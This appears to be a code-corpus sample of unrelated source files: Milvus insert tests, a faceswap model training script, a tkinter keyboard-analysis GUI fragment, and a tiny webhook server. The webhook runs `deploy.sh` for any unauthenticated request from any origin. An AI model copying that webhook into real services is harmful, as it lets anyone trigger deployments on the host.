collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
method: dataframe just have columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: return successfully with zero results
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L2)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
error = {ct.err_code: 0, ct.err_msg: "Data type not support numpy.ndarray"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_value_not_match(self):
"""
target: test insert data value not match
method: insert data value type not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_value_less(self):
"""
target: test insert value less than other
method: int field value less than vec-field value
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_vector_value_less(self):
"""
target: test insert vector value less than other
method: vec field value less than int field
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_more(self):
"""
target: test insert with fields more
method: field more than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_less(self):
"""
target: test insert with fields less
method: fields less than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert with data that same field has different type data
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.fixture(scope="function", params=[8, 4096])
def dim(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection with different schema and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify collection if exist
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert
2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 15416")
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_multi_times(self, dim):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
step = 120
nb = 12000
collection_w = self.init_collection_general(prefix, dim=dim)[0]
for _ in range(nb // step):
df = cf.gen_default_dataframe_data(step, dim)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with timeout=1
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result, timeout=1)
with pytest.raises(Exception):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(Exception, match=err_msg):
future.result()
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
|
train.py
|
#!/usr/bin python3
""" The script to run the training process of faceswap """
import os
import sys
import threading
import cv2
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
from lib.utils import (get_folder, get_image_paths, set_system_verbosity,
Timelapse)
from plugins.plugin_loader import PluginLoader
class Train():
""" The training process. """
def __init__(self, arguments):
self.args = arguments
self.images = self.get_images()
self.stop = False
self.save_now = False
self.preview_buffer = dict()
self.lock = threading.Lock()
# this is so that you can enter case insensitive values for trainer
trainer_name = self.args.trainer
self.trainer_name = trainer_name
if trainer_name.lower() == "lowmem":
self.trainer_name = "LowMem"
self.timelapse = None
def process(self):
""" Call the training process object """
print("Training data directory: {}".format(self.args.model_dir))
lvl = '0' if self.args.verbose else '2'
set_system_verbosity(lvl)
thread = self.start_thread()
if self.args.preview:
self.monitor_preview()
else:
self.monitor_console()
self.end_thread(thread)
def get_images(self):
""" Check the image dirs exist, contain images and return the image
objects """
images = []
for image_dir in [self.args.input_A, self.args.input_B]:
if not os.path.isdir(image_dir):
print('Error: {} does not exist'.format(image_dir))
exit(1)
if not os.listdir(image_dir):
print('Error: {} contains no images'.format(image_dir))
exit(1)
images.append(get_image_paths(image_dir))
print("Model A Directory: {}".format(self.args.input_A))
print("Model B Directory: {}".format(self.args.input_B))
return images
def start_thread(self):
""" Put the training process in a thread so we can keep control """
thread = threading.Thread(target=self.process_thread)
thread.start()
return thread
def end_thread(self, thread):
""" On termination output message and join thread back to main """
print("Exit requested! The trainer will complete its current cycle, "
"save the models and quit (it can take up a couple of seconds "
"depending on your training speed). If you want to kill it now, "
"press Ctrl + c")
self.stop = True
thread.join()
sys.stdout.flush()
def process_thread(self):
""" The training process to be run inside a thread """
try:
print("Loading data, this may take a while...")
if self.args.allow_growth:
self.set_tf_allow_growth()
model = self.load_model()
trainer = self.load_trainer(model)
self.timelapse = Timelapse.create_timelapse(
self.args.timelapse_input_A,
self.args.timelapse_input_B,
self.args.timelapse_output,
trainer)
self.run_training_cycle(model, trainer)
except KeyboardInterrupt:
try:
model.save_weights()
except KeyboardInterrupt:
print("Saving model weights has been cancelled!")
exit(0)
except Exception as err:
raise err
def load_model(self):
""" Load the model requested for training """
model_dir = get_folder(self.args.model_dir)
model = PluginLoader.get_model(self.trainer_name)(model_dir,
self.args.gpus)
model.load(swapped=False)
return model
def load_trainer(self, model):
""" Load the trainer requested for training """
images_a, images_b = self.images
trainer = PluginLoader.get_trainer(self.trainer_name)
trainer = trainer(model,
images_a,
images_b,
self.args.batch_size,
self.args.perceptual_loss)
return trainer
def run_training_cycle(self, model, trainer):
""" Perform the training cycle """
for iteration in range(0, self.args.iterations):
save_iteration = iteration % self.args.save_interval == 0
viewer = self.show if save_iteration or self.save_now else None
if save_iteration and self.timelapse is not None:
self.timelapse.work()
trainer.train_one_step(iteration, viewer)
if self.stop:
break
elif save_iteration:
model.save_weights()
elif self.save_now:
model.save_weights()
self.save_now = False
model.save_weights()
self.stop = True
def monitor_preview(self):
""" Generate the preview window and wait for keyboard input """
print("Using live preview.\n"
"Press 'ENTER' on the preview window to save and quit.\n"
"Press 'S' on the preview window to save model weights "
"immediately")
while True:
try:
with self.lock:
for name, image in self.preview_buffer.items():
cv2.imshow(name, image)
key = cv2.waitKey(1000)
if key == ord("\n") or key == ord("\r"):
break
if key == ord("s"):
self.save_now = True
if self.stop:
break
except KeyboardInterrupt:
break
@staticmethod
def monitor_console():
""" Monitor the console for any input followed by enter or ctrl+c """
# TODO: how to catch a specific key instead of Enter?
# there isn't a good multiplatform solution:
# https://stackoverflow.com/questions/3523174
# TODO: Find a way to interrupt input() if the target iterations are
# reached. At the moment, setting a target iteration and using the -p
# flag is the only guaranteed way to exit the training loop on
# hitting target iterations.
print("Starting. Press 'ENTER' to stop training and save model")
try:
input()
except KeyboardInterrupt:
pass
@staticmethod
def set_tf_allow_growth():
""" Allow TensorFlow to manage VRAM growth """
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = "0"
set_session(tf.Session(config=config))
def show(self, image, name=""):
""" Generate the preview and write preview file output """
try:
scriptpath = os.path.realpath(os.path.dirname(sys.argv[0]))
if self.args.write_image:
img = "_sample_{}.jpg".format(name)
imgfile = os.path.join(scriptpath, img)
cv2.imwrite(imgfile, image)
if self.args.redirect_gui:
img = ".gui_preview_{}.jpg".format(name)
imgfile = os.path.join(scriptpath, "lib", "gui",
".cache", "preview", img)
cv2.imwrite(imgfile, image)
if self.args.preview:
with self.lock:
self.preview_buffer[name] = image
except Exception as err:
print("could not preview sample")
raise err
|
webhook.py
|
from wsgiref.simple_server import make_server
import subprocess
import json
import threading
def deploy():
subprocess.call(['bash', 'deploy.sh'])
def webhook(environ, start_response):
print("Get Request!")
status = '200 OK'
headers = [
('Content-type', 'application/json; charset=utf-8'),
('Access-Control-Allow-Origin', '*'),
]
start_response(status, headers)
deploy_thread = threading.Thread(target=deploy)
deploy_thread.start()
return [json.dumps({'message': 'OK'}).encode("utf-8")]
httpd = make_server('', 54333, webhook)
print("Serving on port 54333...")
httpd.serve_forever()
|
gui_element.py
|
from tkinter import *
from tkinter.filedialog import askopenfilename, asksaveasfilename
from tkinter.messagebox import askyesno
from kbana import quick_plot, load_recording, save_recording
from kbana.analysis import simulate_recording
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
# Implement the default Matplotlib key bindings.
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
import queue
import threading
from functools import wraps
class ThreadReturn(queue.Queue):
def result(self):
try:
value = self.get(block=False)
except Exception as e:
value = 'there is no result yet'
return value
thread_return = ThreadReturn()
def thread_function(f):
@wraps(f)
def wrapper(*args, **kwargs):
thread_return.put(f(*args, **kwargs))
return wrapper
def _quick_plot(recording, status):
if len(recording) == 0:
status.set('The record is empty')
